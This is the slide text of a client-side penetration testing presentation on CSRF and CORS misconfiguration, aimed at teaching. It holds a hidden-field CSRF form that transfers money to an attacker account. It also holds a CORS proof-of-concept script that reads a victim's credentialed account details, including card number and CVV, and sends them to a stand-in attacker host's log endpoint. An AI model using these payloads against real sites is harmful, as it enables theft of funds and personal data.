2. Client-Side Penetration Testing Presentation
CSRF
CSRF EXPLOITATION
CORS Misconfiguration Misconceptions
CORS Misconfiguration Misconceptions exploitation
3. Pentesters need to find a way to make the victims open the door for them to
get into the network, Or force the victim to execute some scripts and actions
without his will. or reading some personal details . Client side attacks require
user-interaction such as enticing them to click a link, open a document, or
somehow get to your malicious website. or infected website , That's why
companies are very careful about this kind of attacks .
Client-Side Penetration Testing Presentation
4. With a little help of social engineering (such as sending a link via
email or chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to
perform state changing requests like transferring funds, changing
their email address, and so forth. If the victim is an administrative
account, CSRF can compromise the entire web application.
CSRF
5. let's suppose the attacker has found a CSRF that allow him to force the victim to send him
a money in https://poker-example-website.com So with a simple click by the victim on
(View my pictures ) in website-attacker.com/csrf.html the money can be sent to the
attacker .
Example HTML SOURCE :
<form action="https://poker-example-website.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="ATTACKER_ACCT"/>
<input type="hidden" name="amount" value="1000"/>
<input type="submit" value="View my pictures"/>
</form>
CSRF EXPLOITATION
6. For example the attacker can read arbitrary data from the accounts
of other users.
CORS Misconfiguration Misconceptions :
7. If the attacker find a CORS Misconfiguration in https://poker-example-
website.com he can read the victims personal details Example :
Name
Date of birth
Address
Credit card number
Date of expiration card
CVV
If the victim visit poker-example-website.com/cors.html the attacker will receive all
the personnel details in logs.txt that was sent by the request
log?key='+this.responseText
CORS Misconfiguration Misconceptions :
8. Example HTML source :
<!DOCTYPE html>
<html>
<body>
<center>
<h1> CORS POC EXPLOIT </h1>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://api.poker-example-website.com/view.php?action=details',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//website-attacker.com/log?key='+this.responseText;
};
</script>
</body>
</html>